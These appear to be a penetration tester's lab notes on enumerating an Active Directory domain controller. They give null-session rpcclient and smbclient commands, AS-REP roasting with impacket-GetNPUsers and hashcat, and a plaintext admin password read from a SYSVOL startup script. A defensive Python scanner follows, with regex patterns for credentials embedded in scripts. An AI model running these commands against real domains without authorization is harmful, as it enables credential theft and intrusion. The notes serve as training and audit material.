Misc

Enum4linux

Pull a lot of information out of the Domain Controller using enum4linux

enum4linux 10.10.10.161

Password Policy enumeration

crackmapexec smb 10.10.10.161 -u '' -p '' --pass-pol

Put in the report that null authentication allows for domain enumeration

RPCClient

rpcclient -U '' -N 10.10.10.161
enumdomusers
queryusergroups [rid]
queryuser [rid]
querygroup [rid]

GetNPUsers

Queries the target domain for users with 'Do not require Kerberos preauthentication' set and exports their TGT responses (AS-REP hashes) for offline cracking

impacket-GetNPUsers -dc-ip 10.10.10.161 -request htb.local/ -format hashcat
hashcat --example-hashes | grep -i krb
hashcat --example-hashes | less

Credentials inside SYSVOL

Credentials may be stored inside a script in the SYSVOL share of the domain controller. This can still happen in older AD environments.

Anyone with domain credentials can read SYSVOL. To assign default local admin credentials, LAPS is now used instead of Group Policy scripts.

dir \\conda.local\SYSVOL\conda.local

Example path: \\conda.local\SYSVOL\conda.local\Policies\{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1

C:\Windows\system32>type \\conda.local\SYSVOL\conda.local\Policies\{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1
type \\conda.local\SYSVOL\conda.local\Policies\{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}\Machine\Scripts\Startup\Set-Password.ps1
$computer=$env:computername
$user = "Administrator"
$Password = "DefaultAdminPass1!"
$user = [adsi]"WinNT://$computer/$user,user"
$user.SetPassword($Password)
net user administrator /active:yes
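To find this kind of leak before someone else does, an added example (not from the original notes) that walks a copy of SYSVOL and flags scripts carrying hard-coded passwords or password-setting calls; the sample tree, file names and regex patterns are constructed for the example and should be tuned per environment.

```python
"""Audit a SYSVOL copy for GPO scripts that embed credentials."""
import os
import re
import tempfile

# Script types that Group Policy typically deploys; .xml covers legacy GPP files.
SCRIPT_EXTENSIONS = {".ps1", ".bat", ".cmd", ".vbs", ".xml"}

# Heuristic patterns (assumptions for this example) that indicate an embedded secret.
PATTERNS = [
    re.compile(r"\$\w*pass\w*\s*=\s*['\"][^'\"]+['\"]", re.I),  # $Password = "..."
    re.compile(r"\.SetPassword\(", re.I),                        # ADSI SetPassword() call
    re.compile(r"\bnet\s+user\s+\S+\s+(?!/)\S+", re.I),         # net user <name> <pass>
    re.compile(r"cpassword\s*=", re.I),                          # GPP cpassword attribute
]


def scan_sysvol(root):
    """Return (relative_path, line_number, line) for every suspicious line under root."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if os.path.splitext(name)[1].lower() not in SCRIPT_EXTENSIONS:
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                for lineno, line in enumerate(fh, 1):
                    if any(p.search(line) for p in PATTERNS):
                        findings.append((os.path.relpath(path, root), lineno, line.strip()))
    return findings


def build_sample_sysvol():
    """Constructed sample: one leaking startup script (as in the notes) and one clean script."""
    root = tempfile.mkdtemp(prefix="sysvol_")
    gpo = os.path.join(root, "Policies", "{EA3B53C1-DDB1-4E62-818F-B7E7933A4E44}",
                       "Machine", "Scripts", "Startup")
    os.makedirs(gpo)
    with open(os.path.join(gpo, "Set-Password.ps1"), "w") as fh:
        fh.write('$computer=$env:computername\n$user = "Administrator"\n'
                 '$Password = "DefaultAdminPass1!"\n'
                 '$user = [adsi]"WinNT://$computer/$user,user"\n'
                 '$user.SetPassword($Password)\nnet user administrator /active:yes\n')
    with open(os.path.join(gpo, "Map-Drives.bat"), "w") as fh:
        fh.write("net use H: \\\\fileserver\\home\n")  # benign, must not be flagged
    return root


if __name__ == "__main__":
    for rel, lineno, text in scan_sysvol(build_sample_sysvol()):
        print(f"{rel}:{lineno}: {text}")
```

Point the scanner at a mounted SYSVOL path (or an offline copy) instead of the sample tree to audit a real domain.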

SMB and RPC Null Authentication

smbclient -L \\\\10.10.10.100\\ -U '' -N
rpcclient -U '' -N 10.10.10.169

Notes

Look at the RID (the last number of a SID): built-in accounts and groups use well-known RIDs starting at 500 (500 is Administrator, 512 is Domain Admins), so a group whose RID is above 1000 is not a default Windows group but one that was created later
